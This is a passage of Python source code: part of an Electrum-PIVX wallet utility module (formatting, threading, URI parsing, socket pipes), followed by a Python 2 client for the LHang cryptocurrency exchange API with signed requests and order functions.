return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
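# --- Hedged illustration (not part of the original module) ---
# Example of applying the profiler decorator; when verbose output is enabled,
# each call prints a line like "[profiler] example_slow_sum 0.0123".
@profiler
def example_slow_sum(n):
    """Illustrative only: a deliberately slow function to demonstrate @profiler."""
    return sum(range(n))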
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    cast string to a bytes-like object; bytearray input is copied (kept for Python 2 support)
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-pivx")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Pivx")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Pivx")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
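# --- Hedged illustration (not part of the original module) ---
# With the defaults (8 decimal places), format_satoshis(1234500000) is expected
# to render as '12.345' (the decimal separator follows the current locale), and
# is_diff=True prefixes '+' to positive amounts.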
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc',
{'tx': 'tx', 'addr': 'address'}),
'Blockchair.com': ('https://blockchair.com/bitcoin',
{'tx': 'transaction', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a PIVX address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a PIVX URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid PIVX address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
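# --- Hedged illustration (not part of the original module) ---
# create_URI(addr, 150000000, 'donation') is expected to produce a string of the
# form 'bitcoin:<addr>?amount=1.5&message=donation', and parse_URI() applied to
# that string returns a dict with 'address', 'amount' (in satoshis) and
# 'message'/'memo' keys.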
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
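# --- Hedged usage sketch (not part of the original module) ---
# Cross-wiring two QueuePipe endpoints gives an in-process request/response
# channel, which is handy for exercising code that expects a pipe-like object.
if __name__ == '__main__':
    a_to_b, b_to_a = queue.Queue(), queue.Queue()
    side_a = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
    side_b = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
    side_a.send({'id': 0, 'method': 'server.version'})
    print_msg(side_b.get())  # -> {'id': 0, 'method': 'server.version'}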
|
vnlhang.py
|
# encoding: utf-8
import urllib
import hashlib
import requests
from Queue import Queue, Empty
from threading import Thread
from time import sleep
LHANG_API_ROOT ="https://api.lhang.com/v1/"
FUNCTION_TICKER = ('ticker.do', 'get')
FUNCTION_DEPTH = ('depth.do', 'get')
FUNCTION_TRADES = ('trades.do', 'get')
FUNCTION_KLINE = ('kline.do', 'get')
FUNCTION_USERINFO = ('user_info.do', 'post')
FUNCTION_CREATEORDER = ('create_order.do', 'post')
FUNCTION_CANCELORDER = ('cancel_order.do', 'post')
FUNCTION_ORDERSINFO = ('orders_info.do', 'post')
FUNCTION_ORDERSINFOHISTORY = ('orders_info_history.do', 'post')
#----------------------------------------------------------------------
def signature(params, secretKey):
"""生成签名"""
params = sorted(params.iteritems(), key=lambda d:d[0], reverse=False)
params.append(('secret_key', secretKey))
message = urllib.urlencode(params)
m = hashlib.md5()
m.update(message)
m.digest()
sig=m.hexdigest()
return sig
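# --- Hedged illustration (not part of the original file) ---
# signature({'symbol': 'btc_cny', 'api_key': 'k'}, 'secret') sorts the parameters
# by key, appends ('secret_key', 'secret'), url-encodes the pairs and returns the
# hex MD5 digest of that query string, which the exchange expects in 'sign'.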
########################################################################
class LhangApi(object):
""""""
DEBUG = True
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.apiKey = ''
self.secretKey = ''
        self.interval = 1       # wait between consecutive requests
        self.active = False     # whether the API worker is active
        self.reqID = 0          # request sequence number
        self.reqQueue = Queue() # request queue
        self.reqThread = Thread(target=self.processQueue)  # request worker thread
#----------------------------------------------------------------------
def init(self, apiKey, secretKey, interval):
"""初始化"""
self.apiKey = apiKey
self.secretKey = secretKey
self.interval = interval
self.active = True
self.reqThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.reqThread.isAlive():
self.reqThread.join()
#----------------------------------------------------------------------
def processRequest(self, req):
"""处理请求"""
# 读取方法和参数
api, method = req['function']
params = req['params']
url = LHANG_API_ROOT + api
        # add the mandatory api_key field to the parameters
params['api_key'] = self.apiKey
        # add the signature
sign = signature(params, self.secretKey)
params['sign'] = sign
        # send the request
payload = urllib.urlencode(params)
r = requests.request(method, url, params=payload)
if r.status_code == 200:
data = r.json()
return data
else:
return None
#----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
                req = self.reqQueue.get(block=True, timeout=1)  # block for at most one second
callback = req['callback']
reqID = req['reqID']
data = self.processRequest(req)
                # request failed
if data is None:
                    error = u'Request failed'
self.onError(error, req, reqID)
elif 'error_code' in data:
                    error = u'Request error, error code: %s' % data['error_code']
self.onError(error, req, reqID)
                # request succeeded
else:
if self.DEBUG:
print callback.__name__
callback(data, req, reqID)
                # rate-limit pause between requests
sleep(self.interval)
except Empty:
pass
#----------------------------------------------------------------------
def sendRequest(self, function, params, callback):
"""发送请求"""
# 请求编号加1
self.reqID += 1
        # build the request dict and put it on the queue
req = {}
req['function'] = function
req['params'] = params
req['callback'] = callback
req['reqID'] = self.reqID
self.reqQueue.put(req)
        # return the request ID
return self.reqID
#----------------------------------------------------------------------
def onError(self, error, req, reqID):
"""错误推送"""
print error, req, reqID
###############################################
    # Market data API
###############################################
#----------------------------------------------------------------------
def getTicker(self, symbol):
"""查询行情"""
function = FUNCTION_TICKER
params = {'symbol': symbol}
callback = self.onGetTicker
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getDepth(self, symbol, size, merge):
"""查询深度"""
function = FUNCTION_DEPTH
params = {
'symbol': symbol,
'size': size,
            'merge': merge
}
callback = self.onGetDepth
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getTrades(self, symbol, size, time):
"""查询历史成交"""
function = FUNCTION_TRADES
params = {
'symbol': symbol,
'size': size,
'time': time
}
callback = self.onGetTrades
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getKline(self, symbol, size, type_, time):
"""查询K线"""
function = FUNCTION_KLINE
params = {
'symbol': symbol,
'size': size,
'type': type_,
'time': time
}
callback = self.onGetKline
return self.sendRequest(function, params, callback)
#----------------------------------------------------------------------
def onGetTicker(self, data, req, reqID):
"""查询行情回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetDepth(self, data, req, reqID):
"""查询深度回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetTrades(self, data, req, reqID):
"""查询历史成交"""
print data, reqID
# ----------------------------------------------------------------------
def onGetKline(self, data, req, reqID):
"""查询K线回报"""
print data, reqID
###############################################
    # Trading API
###############################################
# ----------------------------------------------------------------------
def getUserInfo(self):
"""查询账户信息"""
function = FUNCTION_USERINFO
params = {}
callback = self.onGetUserInfo
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def createOrder(self, symbol, type_, price, amount):
"""发送委托"""
function = FUNCTION_CREATEORDER
params = {
'symbol': symbol,
'type': type_,
'price': price,
'amount': amount
}
callback = self.onCreateOrder
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def cancelOrder(self, symbol, orderId):
"""撤单"""
function = FUNCTION_CANCELORDER
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onCancelOrder
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfo(self, symbol, orderId):
"""查询委托"""
function = FUNCTION_ORDERSINFO
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onGetOrdersInfo
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfoHistory(self, symbol, status, currentPage, pageLength):
"""撤单"""
function = FUNCTION_ORDERSINFOHISTORY
params = {
'symbol': symbol,
'status': status,
'current_page': currentPage,
'page_length': pageLength
}
callback = self.onGetOrdersInfoHistory
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def onGetUserInfo(self, data, req, reqID):
"""查询账户信息"""
print data, reqID
# ----------------------------------------------------------------------
def onCreateOrder(self, data, req, reqID):
"""委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onCancelOrder(self, data, req, reqID):
"""撤单回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfo(self, data, req, reqID):
"""查询委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfoHistory(self, data, req, reqID):
"""撤单回报"""
print data, reqID
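# --- Hedged usage sketch (not part of the original file) ---
# The API is asynchronous: requests are queued and answered via the on* callbacks
# above. The key values and trading symbol below are placeholders.
if __name__ == '__main__':
    api = LhangApi()
    api.init(apiKey='your_api_key', secretKey='your_secret_key', interval=1)
    api.getTicker('btc_cny')   # the response is printed by onGetTicker
    sleep(5)                   # let the worker thread process the request
    api.exit()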
|